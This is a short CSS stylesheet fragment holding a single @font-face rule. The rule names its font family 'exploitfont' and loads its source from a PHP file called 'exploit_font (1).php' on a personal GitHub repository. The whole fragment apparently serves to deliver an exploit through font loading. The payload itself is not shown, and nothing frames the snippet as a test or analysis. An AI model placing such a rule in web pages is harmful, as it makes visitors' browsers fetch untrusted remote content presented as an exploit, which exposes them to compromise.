@font-face {
    font-family: 'exploitfont';
    src: url('https://github.com/Tyrexs1/hahaha/raw/refs/heads/main/exploit_font%20(1).php');
    font-style: normal;
    font-weight: normal;
}




